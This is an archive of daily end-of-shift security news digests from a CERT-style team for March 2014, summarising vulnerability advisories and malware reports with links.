======================= = End-of-Shift report = ======================= Timeframe: Montag 24-03-2014 18:00 − Dienstag 25-03-2014 18:00 Handler: Robert Waldner Co-Handler: n/a *** Microsoft Security Advisory (2953095): Vulnerability in Microsoft Word Could Allow Remote Code Execution - Version: 1.0 *** --------------------------------------------- Microsoft is aware of a vulnerability affecting supported versions of Microsoft Word. At this time, we are aware of limited, targeted attacks directed at Microsoft Word 2010. The vulnerability could allow remote code execution if a user opens a specially crafted RTF file using an affected version of Microsoft Word, or previews or opens a specially crafted RTF email message in Microsoft Outlook while using Microsoft Word as the email viewer. --------------------------------------------- http://technet.microsoft.com/en-us/security/advisory/2953095 *** Security Advisory 2953095: recommendation to stay protected and for detections *** --------------------------------------------- Today, Microsoft released Security Advisory 2953095 to notify customers of a vulnerability in Microsoft Word. At this time, we are aware of limited, targeted attacks directed at Microsoft Word 2010. This blog will discuss mitigations and temporary defensive strategies that will help customers to protect themselves while we are working on a security update. This blog also provides some preliminary details of the exploit code observed in the wild. Mitigations and Workaround The in the wild --------------------------------------------- http://blogs.technet.com/b/srd/archive/2014/03/24/security-advisory-2953095… *** [dos] - Windows Media Player 11.0.5721.5230 - Memory Corruption PoC *** --------------------------------------------- #[+] Exploit Title: Windows Media Player 11.0.5721.5230 Memory Corruption PoC #[+] Date: 22-03-2014 #[+] Category: DoS/PoC #[+] Tested on: WinXp/Windows 7 Pro --------------------------------------------- http://www.exploit-db.com/exploits/32477 *** Security Notice- Allegro RomPager Information Disclosure Vulnerability in Multiple Huawei Routers *** --------------------------------------------- Huawei has noticed an information disclosure vulnerability on the RomPager embedded web server, which is developed by Allegro. The vulnerability affects Huawei HG520c, MT880, and MT886 access routers. --------------------------------------------- http://www.huawei.com/en/security/psirt/security-bulletins/security-notices… *** Bugtraq: Deutsche Telekom CERT Advisory [DTC-A-20140324-001] vulnerabilities in cacti *** --------------------------------------------- Summary: Three vulnerabilities were found in cacti version 0.8.7g. The vulnerabilities are: 1) Stored Cross-Site Scripting (XSS) (via URL) 2) Missing CSRF (Cross-Site Request Forgery) token allows execution of arbitrary commands 3) The use of exec-like function calls without safety checks allow arbitrary commands --------------------------------------------- http://www.securityfocus.com/archive/1/531588 *** Bugtraq: Deutsche Telekom CERT Advisory [DTC-A-20140324-003] vulnerabilities in icinga *** --------------------------------------------- Two vulnerabilities were found in icinga version 1.9.1. These vulnerabilities are: 1) several buffer overflows 2) Off-by-one memory access --------------------------------------------- http://www.securityfocus.com/archive/1/531593 *** Bugtraq: Deutsche Telekom CERT Advisory [DTC-A-20140324-002] vulnerabilities in check_mk *** --------------------------------------------- Several vulnerabilities were found in check_mk version 1.2.2p2. The vulnerabilities are: 1 - Reflected Cross-Site Scripting (XSS) 2 - Stored Cross-Site Scripting (XSS) (via URL) 3 - Stored Cross-Site Scripting (XSS) (via external data, no link necessary) 4 - Stored Cross-Site Scripting (XSS) (via external data on service port, no link necessary) 5 - Missing CSRF (Cross-Site Request Forgery) token allows execution of arbitrary commands 6 - Multiple use of exec-like function calls which allow arbitrary commands 7 - Deletion of arbitrary files --------------------------------------------- http://www.securityfocus.com/archive/1/531594 *** Net-snmp snmptrapd Community String Processing Lets Remote Users Deny Service *** --------------------------------------------- A remote user can send a specially crafted SNMP trap request with an empty community string to trigger a flaw in newSVpv() and cause the target snmptrapd service to crash. Systems with the Perl handler enabled are affected. --------------------------------------------- http://www.securitytracker.com/id/1029950 *** Trojan.PWS.OSMP.21 infects payment terminals *** --------------------------------------------- March 25, 2014 Home users aren't the only ones being targeted by today's threats - various financial organisations are receiving their own share of attention from criminals who are crafting malicious applications for ATMs and payment terminals. Doctor Web has issued a warning regarding one such Trojan, namely, Trojan.PWS.OSMP.21. This malware is infecting the terminals of a major Russian payment system. --------------------------------------------- http://news.drweb.com/show/?i=4259&lng=en&c=9 *** RSA BSAFE Micro Edition Suite (MES) 4.0.x Denial Of Service *** --------------------------------------------- Summary: RSA BSAFE MES 4.0.5 contains fix for a security vulnerability that could potentially be exploited by malicious users to deny access to the affected system. Details: This vulnerability may cause unpredictable application behavior resulting in a server crash due to faulty certificate chain processing logic. --------------------------------------------- http://cxsecurity.com/issue/WLB-2014030193 *** PHP Fileinfo libmagic AWK File Processing Denial of Service Vulnerability *** --------------------------------------------- A vulnerability has been reported in PHP, which can be exploited by malicious people to cause a DoS (Denial of Service). The vulnerability is caused due to an error in the libmagic library bundled in the Fileinfo extension when processing certain AWK scripts, which can be exploited to cause excessive CPU resources consumption via a specially crafted AWK script file. --------------------------------------------- https://secunia.com/advisories/57564 *** OpenVZ update for kernel *** --------------------------------------------- OpenVZ has issued an update for kernel. This fixes multiple vulnerabilities, which can be exploited by malicious people to potentially compromise a vulnerable system. --------------------------------------------- https://secunia.com/advisories/57573 *** Password Hashing Competition *** --------------------------------------------- Theres a private competition to identify new password hashing schemes. Submissions are due at the end of the month. --------------------------------------------- https://www.schneier.com/blog/archives/2014/03/password_hashin.html

1 0

Tageszusammenfassung - Montag 24-03-2014
by Daily end-of-shift report 24 Mar '14

24 Mar '14

======================= = End-of-Shift report = ======================= Timeframe: Freitag 21-03-2014 18:00 − Montag 24-03-2014 18:00 Handler: Robert Waldner Co-Handler: n/a *** NSA Targets Sys Admins to Infiltrate Networks *** --------------------------------------------- The latest Snowden documents show how the National Security Agency targets system administrators, in particular their personal email and social media accounts, in order to access target networks. --------------------------------------------- http://threatpost.com/nsa-targets-sys-admins-to-infiltrate-networks/104953 *** IBM Security Bulletin: IBM Security Directory Server can be affected by a vulnerability in IBM WebSphere Application Server (CVE-2014-0411) *** --------------------------------------------- The IBM WebSphere Application Server component provided with IBM Security Directory Server is vulnerable to a transport layer security (TLS) timing attack. --------------------------------------------- https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin… *** BlackOS software package automates website hacking, costs $3,800 a year *** --------------------------------------------- An updated version of a malicious software package designed to automate the process of hacking websites is being offered up on underground markets for $3,800 a year, according to a blog by Trend Micro. --------------------------------------------- http://feedproxy.google.com/~r/SCMagazineHome/~3/yw9wyT8CoMQ/ *** WPA2 Wireless Security Crackable WIth "Relative Ease" *** --------------------------------------------- An anonymous reader writes "Achilleas Tsitroulis of Brunel University, UK, Dimitris Lampoudis of the University of Macedonia, Greece and Emmanuel Tsekleves of Lancaster University, UK, have investigated the vulnerabilities in WPA2 and present its weakness. They say that this wireless security system might now be breached with relative ease [original, paywalled paper] by a malicious attack on a network. --------------------------------------------- http://rss.slashdot.org/~r/Slashdot/slashdot/~3/GNlVmrhVOM4/story01.htm *** Android update process gives malware a leg-up to evil: Indiana U *** --------------------------------------------- Old apps get access to privileges that didnt exist when they were written Researchers from Indiana University Bloomington have tagged a vulnerability in the way Android handles updates, which they say puts practically every Android device at risk of malicious software.… --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2014/03/23/android_upd… *** AWS urges developers to scrub GitHub of secret keys *** --------------------------------------------- Devs hit with unexpected bills after leaving secret keys exposed. Amazon Web Services (AWS) is urging developers using the code sharing site GitHub to check their posts to ensure they havent inadvertently exposed their log-in credentials. --------------------------------------------- http://www.itnews.com.au/News/375785,aws-urges-developers-to-scrub-github-o… *** D-Link DIR-600L Cross-Site Request Forgery Vulnerability *** --------------------------------------------- A vulnerability has been reported in D-Link DIR-600L, which can be exploited by malicious people to conduct cross-site request forgery attacks. The application allows users to perform certain actions via HTTP requests without performing proper validity checks to verify the requests. This can be exploited to e.g. change administrative credentials when a logged-in user visits a specially crafted web page. --------------------------------------------- https://secunia.com/advisories/57392 *** Array Networks vxAG / vAPV Undocumented Accounts Security Issues *** --------------------------------------------- Some security issues have been reported in Array Networks vxAG and vAPV, which can be exploited by malicious people to bypass certain security restrictions. The security issues are caused due to the device using certain undocumented user accounts with default credentials, which can be exploited to gain otherwise restricted access to the device. --------------------------------------------- https://secunia.com/advisories/57442 *** PayPal for Android SSL Certificate Validation Security Issue *** --------------------------------------------- MWR InfoSecurity has reported a security issue in PayPal for Android, which can be exploited by malicious people to conduct spoofing attacks. The security issue is caused due to an error when verifying server SSL certificate within the WebHybridClient class and can be exploited to spoof a HTTPS connection and e.g. conduct Man-in-the-Middle (MitM) attacks. --------------------------------------------- https://secunia.com/advisories/57351 *** php-font-lib "name" Cross-Site Scripting Vulnerability *** --------------------------------------------- Daniel C. Marques has reported a vulnerability in php-font-lib, which can be exploited by malicious people to conduct cross-site scripting attacks. Input passed via the "name" GET parameter to www/make_subset.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. --------------------------------------------- https://secunia.com/advisories/57558

1 0

Tageszusammenfassung - Freitag 21-03-2014
by Daily end-of-shift report 21 Mar '14

21 Mar '14

======================= = End-of-Shift report = ======================= Timeframe: Donnerstag 20-03-2014 18:00 − Freitag 21-03-2014 18:00 Handler: Robert Waldner Co-Handler: Alexander Riepl *** Taken in phishing attack, Microsoft's unmentionables aired by hacktivists *** --------------------------------------------- If Microsoft and eBay arent safe from social engineering attacks, who is? --------------------------------------------- http://feeds.arstechnica.com/~r/arstechnica/security/~3/B9IE0Uei57U/ *** Kaspersky Internet Security Regular Expression Patterns Processing Denial of Service Vulnerability *** --------------------------------------------- CXsecurity has discovered a vulnerability in Kaspersky Internet Security, which can be exploited by malicious people to cause a DoS (Denial of Service). The vulnerability is caused due to an error when processing regular expression patterns and can be exploited to exhaust CPU resources and render the system unusable. --------------------------------------------- https://secunia.com/advisories/57316 *** DotNetNuke Unspecified Script Insertion Vulnerability *** --------------------------------------------- A vulnerability has been reported in DotNetNuke, which can be exploited by malicious users to conduct script insertion attacks. Certain unspecified input is not properly sanitised before being used. This can be exploited to insert arbitrary HTML and script code, which will be executed in a user's browser session in context of an affected site when the malicious data is being viewed. --------------------------------------------- https://secunia.com/advisories/57429 *** WordPress WP-Filebase Download Manager Plugin Arbitrary Code Execution Vulnerability *** --------------------------------------------- A vulnerability has been reported in the WP-Filebase Download Manager plugin for WordPress, which can be exploited by malicious users to compromise a vulnerable system. ... Successful exploitation of this vulnerability requires access rights to upload files (e.g. "Editor" access rights). The vulnerability is reported in version 0.3.0.03. Prior versions may also be affected. --------------------------------------------- https://secunia.com/advisories/57456 *** Zeus variant blocks user activity with full-screen pop-ups *** --------------------------------------------- Infected users are forced to contend with open windows, which are actually legitimate sites being displayed on their desktops. --------------------------------------------- http://feedproxy.google.com/~r/SCMagazineHome/~3/KHHSZFOdcH0/ *** A peek inside a modular, Tor C&C enabled, Bitcoin mining malware bot *** --------------------------------------------- Cybercriminals continue to maliciously 'innovate', further confirming the TTP (tactics, techniques and procedure) observations we made in our Cybercrime Trends 2013 assessment back in December, 2013, namely, that the diverse cybercrime ecosystem is poised for exponential growth. Standardizing the very basics of fraudulent and malicious operations, throughout the years, cybercriminals have successfully achieved a state of malicious economies of scale... --------------------------------------------- http://feedproxy.google.com/~r/WebrootThreatBlog/~3/V6XSH_U-eoU/ *** Siemens SIMATIC S7-1200 Improper Input Validation Vulnerabilities *** --------------------------------------------- OVERVIEWSiemens has reported two improper input validation vulnerabilities discovered separately by Prof. Dr. Hartmut Pohl of softScheck GmbH and Arne Vidström of Swedish Defence Research Agency (FOI) in Siemens' SIMATIC S7-1200 PLC. Siemens has produced a new version that mitigates these vulnerabilities.These vulnerabilities could be exploited remotely.AFFECTED PRODUCTSThe following SIMATIC S7-1200 PLC versions are affected: --------------------------------------------- http://ics-cert.us-cert.gov/advisories/ICSA-14-079-01 *** Siemens SIMATIC S7-1200 Vulnerabilities *** --------------------------------------------- OVERVIEWSiemens, Ralf Spenneberg of OpenSource Training, Lucian Cojocar of EURECOM, Sascha Zinke from the FU Berlin's work team SCADACS, and Positive Technologies' researchers (Alexey Osipov, and Alex Timorin) have identified six vulnerabilities in the Siemens SIMATIC S7-1200 CPU family. Siemens has produced a new product release that mitigates these vulnerabilities.These vulnerabilities could be exploited remotely. --------------------------------------------- http://ics-cert.us-cert.gov/advisories/ICSA-14-079-02 *** Cisco AsyncOS Patch , (Fri, Mar 21st) *** --------------------------------------------- Cisco released a patch for AsyncOS, the operating system used in its E-Mail Security Appliance (ESA) and Security Management Appliance (SMA). The vulnerability is exploited by an authenticated attacker uploading a crafted blocklist file. The file has to be uploaded via FTP, so this vulnerability is only exploitable if the FTP service is enabled. Once the blacklist is pared, arbitrary commands are executed. This sounds like an OS command injection vulnerability. The parameters (assumed to be --------------------------------------------- http://isc.sans.edu/diary.html?storyid=17839&rss *** Linux Kernel Netfilter DCCP Processing Flaw Lets Remote Users Execute Arbitrary Code *** --------------------------------------------- Description: A vulnerability was reported in the Linux Kernel. A remote user can execute arbitrary code on the target system. A remote user can send specially crafted DCCP data to trigger a memory corruption flaw in 'nf_conntrack_proto_dccp.c' and execute arbitrary code on the target system. --------------------------------------------- http://www.securitytracker.com/id/1029945 *** Horde Framework Unserialize PHP Code Execution *** --------------------------------------------- Topic: Horde Framework Unserialize PHP Code Execution Risk: High Text:## # This module requires Metasploit --------------------------------------------- http://cxsecurity.com/issue/WLB-2014030175 *** Monitoring for unusual network traffic key to banking botnet detection *** --------------------------------------------- Malware authors have had great success targeting financial institutions in recent years, and in turn those organizations have a vested interest in improving their banking botnet detection capabilities. However, one expert says financial firms are failing because they ignore unusual network traffic. --------------------------------------------- http://searchsecurity.techtarget.com/news/2240216637/Monitoring-for-unusual… *** Nokia X Android smartphone security features detailed *** --------------------------------------------- ... the Nokia X comes with the required security features to protect the data stored on the device without downloading third-party security apps. The three main ways to protect the data on the Nokia X smartphone is the screen security, encryption, and SIM card lock. --------------------------------------------- http://gadgets.ndtv.com/mobiles/news/nokia-x-android-smartphone-security-fe… *** Linux Worm Darlloz Infects over 31,000 Devices in Four Months *** --------------------------------------------- The worm is designed to infect computers running Intel x86 architectures, but it's also capable of infecting devices running MIPS, ARM, PowerPC architectures. Routers, set-top boxes and other devices usually have this kind of architecture. Based on its investigation, Symantec has determined that the main goal of Darlloz is to abuse infected devices for crypto-currency mining. Once it's installed on a computer, the worm installs open source mining software (cpuminer). --------------------------------------------- http://news.softpedia.com/news/Linux-Worm-Darlloz-Infects-over-31-000-Devic… *** Mass-Produced ATM Skimmers, Rogue PoS Terminals via 3D Printing? *** --------------------------------------------- On several underground forums, a cybercriminal named gripper is selling ATM skimmers and fake POS terminals, and is making some very bold claims doing so: Figure 1. Underground advertisement. The cybercriminal claims that he can mass-produce VeriFone VerixV point-of-sale (PoS) devices. (Verifone is a US-based provider of POS terminals.) Some specific VeriFone products such as the Vx510... --------------------------------------------- http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/YmksHI4j1OM/ *** Spotlight on Java SE 8 Security *** --------------------------------------------- March 18, 2014 was the long anticipated release of Java SE 8. I though I would spotlight some of the key security features of Java 8 for readers. First, many are not aware of security improvements made to Java 7. Let's begin with a quick review the Java SE 7 security features that were rolled into Java SE 8. --------------------------------------------- http://www.securitycurmudgeon.com/2014/03/20/spotlight-on-java-se-8-securit… *** IBM Security Bulletin: IBM WebSphere MQ Internet Pass-Thru - Potential denial of service on the command port listener (CVE-2013-5401) *** --------------------------------------------- A denial of service vulnerability exists and could be exploited by a remotely connected user to stop the remote administration service. CVE(s): CVE-2013-5401 Affected product(s) and affected version(s): WebSphere MQIPT 2.1.0.0 WebSphere MQIPT 2.0.x Refer to the following reference URLs for remediation and additional vulnerability details: Source Bulletin: http://www-01.ibm.com/support/docview.wss?uid=swg21666863 X-Force Database: http://xforce.iss.net/xforce/xfdb/87297 --------------------------------------------- https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin… *** OpenSSL ECDSA Nonces Recovery Weakness *** --------------------------------------------- Yuval Yarom and Naomi Benger have reported a weakness in OpenSSL, which can be exploited by malicious, local users to disclose certain sensitive information. --------------------------------------------- https://secunia.com/advisories/57091 *** OpenSSH "child_set_env()" Security Bypass Security Issue *** --------------------------------------------- The security issue is caused due to an error within the "child_set_env()" function (usr.bin/ssh/session.c) and can be exploited to bypass intended environment restrictions by using a substring before a wildcard character. --------------------------------------------- https://secunia.com/advisories/57488 *** Oracle VirtualBox 3D Acceleration Multiple Privilege Escalation Vulnerabilities *** --------------------------------------------- Core Security has reported multiple vulnerabilities in Oracle VirtualBox, which can be exploited by malicious, local users in a guest virtual machine to gain escalated privileges. --------------------------------------------- https://secunia.com/advisories/57384 *** Cisco Hosted Collaboration Solution Packet Processing Denial of Service Vulnerability *** --------------------------------------------- A vulnerability has been reported in Cisco Hosted Collaboration Solution, which can be exploited by malicious people to cause a DoS (Denial of Service). --------------------------------------------- https://secunia.com/advisories/57496 *** Video zeigt Jailbreak von iOS 7.1 *** --------------------------------------------- Ein Entwickler hat seine Arbeit an einem Jailbreak von iOS 7.1 demonstriert. Apple hatte mit dem jüngsten iOS-Update die Schwachstellen geschlossen, die für den letzten Jailbreak zum Einsatz kamen. --------------------------------------------- http://www.heise.de/newsticker/meldung/Video-zeigt-Jailbreak-von-iOS-7-1-21…

1 0

Tageszusammenfassung - Donnerstag 20-03-2014
by Daily end-of-shift report 20 Mar '14

20 Mar '14

======================= = End-of-Shift report = ======================= Timeframe: Mittwoch 19-03-2014 18:00 − Donnerstag 20-03-2014 18:00 Handler: Alexander Riepl Co-Handler: Stephan Richter *** ZBOT Adds Clickbot Routine To Arsenal *** --------------------------------------------- The ZeuS/ZBOT malware family is probably one of the most well-known malware families today . It is normally known for stealing credentials associated with online banking accounts. However, ZBOT is no one-trick pony. Some ZBOT variants perform other routines like downloading or dropping other threats like ransomware. We recently came across one variant detected as TROJ_ZCLICK.A,... --------------------------------------------- http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/rrelQiGbzao/ *** New BlackOS Software Package Sold In Underground Forums *** --------------------------------------------- We recently came across this particular post in an underground forum: Figure 1. Underground forum post This particular post in Russian was advertising a new product, known as "BlackOS". Contrary to the name, it is not an operating system. However, it is definitely "black", or malicious: it is used to manage and redirect Internet traffic... --------------------------------------------- http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/mA8O58qz-TQ/ *** Phishing: Gehackter EA-Server hostet falsche Apple-Webseite *** --------------------------------------------- Kriminelle Hacker haben auf Servern des Spieleherstellers Electronic Arts eine gefälschte Webseite untergebracht, die Apple-IDs samt Passwörtern und Kreditkarteninformationen verlangt. Wie viele Nutzer ihre Daten dort eingegeben haben, ist nicht bekannt. --------------------------------------------- http://www.golem.de/news/phishing-gehackter-ea-server-hostet-falsche-apple-… *** "goto fail": Apple drängt Nutzer zum Update *** --------------------------------------------- Der Mac-Hersteller fordert inzwischen dazu auf, das Update auf OS X 10.9.2 alsbald möglich zu installieren - falls noch nicht geschehen. Ältere Versionen von OS X Mavericks und iOS weisen eine gravierende SSL-Schwachstelle auf. --------------------------------------------- http://www.heise.de/security/meldung/goto-fail-Apple-draengt-Nutzer-zum-Upd… *** Android: Sicherheitslücken wegen fehlender Updates bleiben Problem *** --------------------------------------------- 70 Prozent aller Android-Geräte weltweit besitzen eine Browser-Lücke, glaubt ein Forscher. Der simple Aufruf einer Website reicht, um sie auszunutzen. --------------------------------------------- http://www.heise.de/newsticker/meldung/Android-Sicherheitsluecken-wegen-feh… *** Analysis: Spam report: February 2014 *** --------------------------------------------- The share of spam in global email traffic decreased by 7.6 percentage points and averaged 65.7% in January. As forecasted, the drop in the share of spam was due to a lull early in January when there is less business activity and a large number of botnets are turned off. --------------------------------------------- http://www.securelist.com/en/analysis/204792328/Spam_report_February_2014 *** Protokollanalyse: Mogeln im Quizduell *** --------------------------------------------- Entwickler verlassen sich zu sehr auf HTTPS und verzichten auf grundlegende Sicherheitsmaßnahmen. Über eine Man-in-the-Middle-Attacke konnten Security-Forscher in den Datenverkehr zwischen App-Server und Apps hineinsehen - und entdeckten Sonderbares. --------------------------------------------- http://www.golem.de/news/protokollanalyse-mogeln-im-quizduell-1403-105276-r… *** Cisco IronPort AsyncOS Software for ESA and SMA File Validation Flaw Lets Remote Authenticated Users Execute Arbitrary Code *** --------------------------------------------- http://www.securitytracker.com/id/1029937 *** SA-CONTRIB-2014-033 - Nivo Slider - Cross Site Scripting *** --------------------------------------------- Advisory ID: DRUPAL-SA-CONTRIB-2014-033Project: Nivo Slider (third-party module)Version: 7.xDate: 2014-March-19Security risk: Moderately criticalExploitable from: RemoteVulnerability: Cross Site ScriptingDescriptionNivo Slider provides a way to showcase featured content. Nivo Slider gives administrators a simple method of adding slides to the slideshow, an administration interface to configure slideshow settings, and simple slider positioning using the Drupal block system.The module doesnt... --------------------------------------------- https://drupal.org/node/2221481

1 0

Tageszusammenfassung - Mittwoch 19-03-2014
by Daily end-of-shift report 19 Mar '14

19 Mar '14

======================= = End-of-Shift report = ======================= Timeframe: Dienstag 18-03-2014 18:00 − Mittwoch 19-03-2014 18:00 Handler: Alexander Riepl Co-Handler: Stephan Richter *** Apache Update Resolves Security Vulnerabilities *** --------------------------------------------- Apache has released version 2.4.9 of its ubiquitous HTTP web server (HTTPD), resolving two security vulnerabilities and a number of other bugs in the process. --------------------------------------------- http://threatpost.com/apache-update-resolves-security-vulnerabilities/104849 *** Ebury-Rootkit: Zombie-Server greifen täglich eine halbe Million Rechner an *** --------------------------------------------- Zu den Opfern der Malware-Kampagne "Operation Windigo" gehören unter anderem kernel.org und cPanel. Die mit dem Ebury-Rootkit infizierten Server versenden Spam und attackieren Besucher der kompromittierten Webseiten. --------------------------------------------- http://www.heise.de/security/meldung/Ebury-Rootkit-Zombie-Server-greifen-ta… *** Wide Gap Between Attackers, BIOS Forensics Research *** --------------------------------------------- Advanced attackers are ahead of researchers when it comes to understanding firmware vulnerabilities and BIOS forensics, experts from MITRE and Intel said during last weeks CanSecWest. --------------------------------------------- http://threatpost.com/wide-gap-between-attackers-bios-forensics-research/10… *** Avast-Toolbar mit Shopping-Spion *** --------------------------------------------- Die Browser-Toolbar, die unter anderem mit der Antivirensoftware auf den Rechner gelangt, schaut dem Nutzer beim Einkaufen über die Schulter und baut Konkurrenzangebot in die Shop-Seiten ein. --------------------------------------------- http://www.heise.de/security/meldung/Avast-Toolbar-mit-Shopping-Spion-21496… *** Data suggests Android malware threat greatly overhyped *** --------------------------------------------- Its no secret that many in the security industry perceive Google Inc.s Android mobile platform to be plagued by malware, but Android security team lead Adrian Ludwig has made it his mission to eradicate the disingenuous meme of the burgeoning Android malware apocalypse. --------------------------------------------- http://searchsecurity.techtarget.com/news/2240216335/Data-suggests-Android-… *** Mailingliste Full Disclosure macht dicht *** --------------------------------------------- Die bekannte Sicherheits-Mailingliste wurde von ihrem Betreiber bis auf weiteres geschlossen. Full Disclosure war in der Vergangenheit immer wieder Schauplatz der Enthüllung wichtiger Sicherheitslücken. --------------------------------------------- http://www.heise.de/security/meldung/Mailingliste-Full-Disclosure-macht-dic… *** 10 Years of Mobile Malware: How Secure Are You? *** --------------------------------------------- Believe it or not, but it has been 10 years since the first mobile malware was created! On the infographic below, you can see a brief overview of the most important malware events in the past 10 years, with a short description of each of them. --------------------------------------------- https://www.linkedin.com/today/post/article/20140316112657-67886711-10-year… *** New Exploits Arrive for Old PHP Vulnerability *** --------------------------------------------- New exploits for a two-year-old PHP vulnerability popped up in October that allow hackers to run code on websites running vulnerable versions of the web development framework. --------------------------------------------- http://threatpost.com/new-exploits-arrive-for-old-php-vulnerability/104881 *** Fake Tor browser for iOS laced with adware, spyware, members warn *** --------------------------------------------- Title available since November raises questions about App Store vetting process. --------------------------------------------- http://feeds.arstechnica.com/~r/arstechnica/security/~3/qB_-ioinSh4/ *** WordPress Subscribe To Comments Reloaded Plugin Cross-Site Request Forgery Vulnerability *** --------------------------------------------- https://secunia.com/advisories/57015 *** Moodle Multiple Security Issues and Multiple Vulnerabilities *** --------------------------------------------- https://secunia.com/advisories/57331 *** Samba smbcacls security bypass *** --------------------------------------------- http://xforce.iss.net/xforce/xfdb/91849

1 0

Tageszusammenfassung - Dienstag 18-03-2014
by Daily end-of-shift report 18 Mar '14

18 Mar '14

======================= = End-of-Shift report = ======================= Timeframe: Montag 17-03-2014 18:00 − Dienstag 18-03-2014 18:00 Handler: Robert Waldner Co-Handler: Stephan Richter *** Google's Public DNS Hijacked for 22 Minutes *** --------------------------------------------- The attackers hijacked the 8.8.8.8/32 DNS server for approximately 22 minutes. According to BGPmon, networks in Brazil and Venezuela were impacted. A screenshot published by the company shows that the traffic was redirected to BT Latin America's networks. --------------------------------------------- http://news.softpedia.com/news/Google-s-Public-DNS-Hijacked-for-22-Minutes-… *** Anonymisierung: Sniper-Angriff legt Tor-Nodes lahm *** --------------------------------------------- Mit einer sogenannten Sniper-Attacke können Angreifer nicht nur gezielt einzelne Tor-Knoten außer Gefecht setzen, sondern innerhalb von wenige Minuten das gesamte Netzwerk lahmlegen. Ein Patch wurde bereits erarbeitet. --------------------------------------------- http://www.golem.de/news/anonymisierung-sniper-angriff-legt-tor-nodes-lahm-… *** Scans for FCKEditor File Manager, (Mon, Mar 17th) *** --------------------------------------------- FCKEditor (now known as CKEditor [1]) is a popular full featured GUI editor many web sites use. For example, you frequently find it with blog systems like WordPress or as part of commenting/forum systems. As an additional feature, a filemanager can be added to allow users to upload images or other files. Sadly, while a very nice and functional plugin, this features if frequently not well secured and can be used to upload malicious files. We have seen some scans probing specifically... --------------------------------------------- http://isc.sans.edu/diary.html?storyid=17821&rss *** Hintergründe des Typo3-Hacks weiter im Dunkeln *** --------------------------------------------- Die Typo3 Association hat keine Informationen zu der Schwachstelle hinter dem Casino-Spam-Hack, der viele Typo3-Webseiten betrifft, und vermutet, dass der Hack andere Ursachen hat. Seiten ohne Typo-Installation sollen ebenfalls betroffen sein. --------------------------------------------- http://www.heise.de/newsticker/meldung/Hintergruende-des-Typo3-Hacks-weiter… *** Hidden Windigo UNIX ZOMBIES are EVERYWHERE *** --------------------------------------------- Check and wipe: The la-la-la-its-not-happening plan is no good Hackers using a Trojan seized control of over 25,000 Unix servers worldwide to create a potent spam and malware distribution platform. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2014/03/18/windigo_uni… *** Threatglass Tool Gives Deep Look Inside Compromised Sites *** --------------------------------------------- Trying to enumerate the compromised sites on the Internet is a Sisyphian task. Luckily, it's not a task that anyone really needs to perform any longer, especially now that Barracuda Labs has released its new Threatglass tool, a Web-based frontend that allows users to query a massive database of compromised sites to get detailed information... --------------------------------------------- http://threatpost.com/threatglass-tool-gives-deep-look-inside-compromised-s… *** March 2014 Security Bulletin Webcast and Q&A *** --------------------------------------------- Today we published the March 2014 Security Bulletin Webcast Questions & Answers page. We answered eight questions in total, with the majority focusing on the updates for Windows (MS14-016) and Internet Explorer (MS14-012). One question that was not answered on air has been included on the Q&A page. --------------------------------------------- http://blogs.technet.com/b/msrc/archive/2014/03/17/march-2014-security-bull… *** When ASLR makes the difference *** --------------------------------------------- We wrote several times in this blog about the importance of enabling Address Space Layout Randomization mitigation (ASLR) in modern software because it's a very important defense mechanism that can increase the cost of writing exploits for attackers and in some cases prevent reliable exploitation. In today's blog, we'll go through ASLR one more time to show in practice how it can be valuable to mitigate two real exploits seen in the wild and to suggest solutions for programs... --------------------------------------------- https://blogs.technet.com/b/srd/archive/2014/03/12/when-aslr-makes-the-diff… *** Red Hat plans unified security management for Fedora 21 *** --------------------------------------------- One crypto policy to bind them Red Hat is planning a significant change to how its Fedora Linux distribution handles crypto policy, to ship with the due-in-late-2014 Fedora 21 release. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2014/03/18/red_hat_pla… *** Open-Xchange AppSuite 7.4.1 / 7.4.2 Cross Site Scripting *** --------------------------------------------- Topic: Open-Xchange AppSuite 7.4.1 / 7.4.2 Cross Site Scripting Risk: Low Text:Product: Open-Xchange AppSuite Vendor: Open-Xchange GmbH Internal reference: 31065 Vulnerability type: Cross Site Scriptin... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014030134 *** Security Advisory-Y.1731 Vulnerability on Some Huawei Switches *** --------------------------------------------- Y.1731 is an ITU-T recommendation for OAM features on Ethernet-based networks. Y.1731 provides connectivity detection, diagnosis, and performance monitoring for VLAN/VSI services on MANs. Some Huawei switches support Y.1731 and therefore, has the Y.1731 vulnerability in processing special packets. The vulnerability causes the restart of switches (Vulnerability ID: HWPSIRT-2013-1165). --------------------------------------------- http://www.huawei.com/en/security/psirt/security-bulletins/security-advisor… *** OpenSSH AcceptEnv Wildcard Processing Flaw May Let Remote Authenticated Users Bypass Environment Restrictions *** --------------------------------------------- http://www.securitytracker.com/id/1029925 *** DSA-2880 python2.7 *** --------------------------------------------- security update --------------------------------------------- http://www.debian.org/security/2014/dsa-2880 *** Bugtraq: 2014 World Conference on IST - Madeira Island, April 15-17 *** --------------------------------------------- The 2014 World Conference on Information Systems and Technologies --------------------------------------------- http://www.securityfocus.com/archive/1/531513

1 0

Tageszusammenfassung - Montag 17-03-2014
by Daily end-of-shift report 17 Mar '14

17 Mar '14

